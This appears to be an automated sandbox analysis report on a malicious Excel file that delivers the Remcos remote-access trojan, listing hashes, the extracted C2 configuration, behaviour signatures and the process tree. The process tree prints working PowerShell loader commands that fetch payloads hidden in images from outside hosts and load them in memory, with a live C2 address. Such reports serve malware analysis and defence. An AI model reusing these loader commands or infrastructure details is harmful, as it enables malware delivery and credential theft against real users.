Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-03-2024 06:54

General

  • Target

    1.xla.xls

  • Size

    49KB

  • MD5

    1620224d6efdc7d009b64899a6a67626

  • SHA1

    aa99049bcb8caaac23c7c3a9488b47435ce524ec

  • SHA256

    d1836e6e0661938656d0d8883daa624f59b4a0885cd663be712bfa88a5ccea19

  • SHA512

    88720b9050af39543b21ca51f4771b7b9afecbc7db697fb0116208d2ea18ea290d6b6304ced66d8d602b07cf13664fd4715b0816bd0d93a352c69a275d6600a5

  • SSDEEP

    768:fXyBP0IZ3ovboGfJlETRro0LPpeTQMjpHJDQ/QxLEC65:fX68OPwUTRrnp2hjFJDREC

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Abuses OpenXML format to download file from external location
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1.xla.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1592
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2984
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\pixelcreatedforkissinglove.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1412
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMRK/mrk/ppmax/612.311.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'KRMC','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KRMC.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1632
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zgyutdriykvtugchaaxi"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1036
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jbdeuvckmsnyxnqljlkjvifi"
                6⤵
                • Accesses Microsoft Outlook accounts
                PID:1296
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mdqxuondaafdhbmpawwdxmzzbwi"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:920

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      13368e9212e10aecd8074997c21887fc

      SHA1

      c225f024c16c5ace29126649f8bcad602ec8e9b8

      SHA256

      e6fe54242ca664b58f2312279d5dfd5668aac411b194d206988a20b676415488

      SHA512

      5632b7cef510f9999beea5505d55e570e8eb0b5a676b776f9c5725f3871ee715631328538f2381e5d5d511cd0e4fdaf730d25576edd2c6ab1289bee9ce69fc9d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      0e350d7aec763ee80bef16f56f0c4394

      SHA1

      6f7df908342bbf7e4f9b452cbad3b9ea07240455

      SHA256

      8adb205708e6dbd6e36a1a9c23584bb8a9998d032915bb83dc31ee25caa5d673

      SHA512

      850dc31604dc1d8917d9bd93792329665896cb9e2f2214e54aeaf1edf83d68bbff188b7bc9b961147e6d84cb0d329ce2ec1e558e53e3612d5b64e2be377c5fcc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      242B

      MD5

      a605ec172fff75be11b7a7cea64d9b1f

      SHA1

      6ed94b4e86c6c83ffac85f91660e8a564c6ea066

      SHA256

      e085e03447780fce290c3b4180737840f666aa6f95f6b11c8c1f6974be1d72cf

      SHA512

      6996c89d2a421bf3d3253607b04468fea85e6824a966cf31e321ce55745e70d9058b1185f6b88d99435987579490d3670b94f499214677b35fb9966efbe668ea

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7EF8C05F-4B1C-4C52-BAE0-4AE5EE1CE550}.FSD

      Filesize

      128KB

      MD5

      6591012c283ad796108052e92506379b

      SHA1

      f61e506c8bf3387dba1a91f734c79a1f1766dd63

      SHA256

      281b41565065b42bcbcda2e87e3f73835f29fff148ace8cb518e146fc69120c6

      SHA512

      0c155cb8c769e17732fc3b7de58cd6c91d686f44e3f5f0fce119d8b97834d21f60c898f4751eebcb494d13cd9d12cea960d7d233788ad9c80d163df819a512bd

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      dc26952f1fd031ed3f4acaf0525ea543

      SHA1

      ab973529b9ca7bb5039b0845eb6ab59b01f6e1ec

      SHA256

      4db3d50cb6ec06148b7dc360ae743368d1b530924dc0f982e5cc5c3c023756ee

      SHA512

      e372b24eac78a2646ee853d98f2f91e851f009a23619ea243783cc230ceb78a37941d218cb335872fe3b4ea041d10eeb8747b39f140f42aec4b7bb73dbfd5e89

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{25072E89-4E5A-4C60-85B1-CCCE55637EE8}.FSD

      Filesize

      128KB

      MD5

      2b1c08860d3ca63c8a94b363a6e35e6b

      SHA1

      0b47323e5ceb390ff0b16e93889b8577c632fdbe

      SHA256

      36bd54f4d7b4ce16a43173f587c2fd1110857f81e6bb7ef9aada7a059440e40d

      SHA512

      6980b0c2612208611fb72987c7148e81488a17a6584cde8f7148f86cd738bae8f05ef0b22e14e756d2c993cf55ca8bfba0fc90abdf372a055ff0eaafed027143

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\23EIUNT7\heisagirlwholovedmealotwithoutanyexptationssheisreallyagoodgirlshemybabydear_____itrulylovedherfromthehearbecauseverycutebayb[1].doc

      Filesize

      72KB

      MD5

      1b64a140f23bd235c3c482429cb05065

      SHA1

      141c5ad46db205b08032c22292bef782007fa771

      SHA256

      87394948b0df5b356230dcef42c97b38b2cfa29df166f9cc820b0ff440f491f2

      SHA512

      c9a3cfa93b6edf9644e8eeb2b8f17a6be704d9256c922e3a558e71d82ed752ed3eb9eda4a5739d60712af891929b989a2600151e3ba1e7cde7eaac74cc891b30

    • C:\Users\Admin\AppData\Local\Temp\CabE234.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarFDA1.tmp

      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\TarFF3D.tmp

      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    • C:\Users\Admin\AppData\Local\Temp\zgyutdriykvtugchaaxi

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • C:\Users\Admin\AppData\Local\Temp\{7D3B2A28-1A1C-4D6F-8E9C-042607B0808D}

      Filesize

      128KB

      MD5

      cfb2a6835e744529b1731491c8174245

      SHA1

      8fd382193c68cc2b2b53a429982b59fff1a88ed1

      SHA256

      296eff8cde2dab64da624f1cf7d8d11266c0457bce8fb334e3c5bce59833d768

      SHA512

      5897945bf1f6882e0020429653ec9d84125a20b5bd89407286527696c395d9342dbe4ed178694a823ddf826fb3fc66a46a83590094413246df41c0ec8429755e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      d4c5e79ca048d54358a608157a8b44ab

      SHA1

      77cc1a0f786c2f7693a7ff75bcaec26eba8d9b9c

      SHA256

      ec72fc3cc88b846370fe1d1d5433b57ddb17c52110346e97968873119227b150

      SHA512

      037e6496c1abae7a5184154e700fa7daf3e53c51465c961b6334b76268d622af99eeb12857cfaa9ab0b927f5d8adb68940ff85554f718c4cedd54df448273e44

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IHHPP129.txt

      Filesize

      71B

      MD5

      7bf3633684af71f75cf8e14a27833e39

      SHA1

      4b3ef162da7502b03f822cc727c2fe377063647b

      SHA256

      e2865a96b62f9215f78bb412a081cd3bb50d202f94f533da7971a0b39ebe939c

      SHA512

      cf0431532f8f918d000edcc4d8baa86f4fa7136f80d3745aad6014e8ecfd97b221a9954f56b0a4eeefa3cdcde89171ac144b174cceb1d1a2c160125e4f3e5b57

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      e6b119faa431d07efd41663704c161d4

      SHA1

      75eafe6e00bc7aab8f53eea338b8906e56aa3468

      SHA256

      d2eb3efc123846af8de9461cd1baf611ba7bb93fe655fe5dec85344fabae453f

      SHA512

      afd85b7efc37b14e38a2b65b6a18198fed6d691f28d492cab76ed790367fda8d0b7273a4638a8d66f06a2a8eff02535d734bed0b9e12463f60e385f894955c24

    • C:\Users\Admin\AppData\Roaming\pixelcreatedforkissinglove.vbs

      Filesize

      5KB

      MD5

      e6a0cfb0bb1713dba11e14c0615977d2

      SHA1

      2a7a1e1519085b6939fa225e90cd6e23a054c896

      SHA256

      aaed8e24ca09554c52a4172ba76d724581c6dab04e2153023b0485d898378a60

      SHA512

      9a9f7de58b9813c7193dbe6b510655d60cef1f7db4486e7255c48e7301a21b54c73b77e0cac12330c7c458f39a9e2cb8bfff56074fcb3b5fedf49f21256ddbad
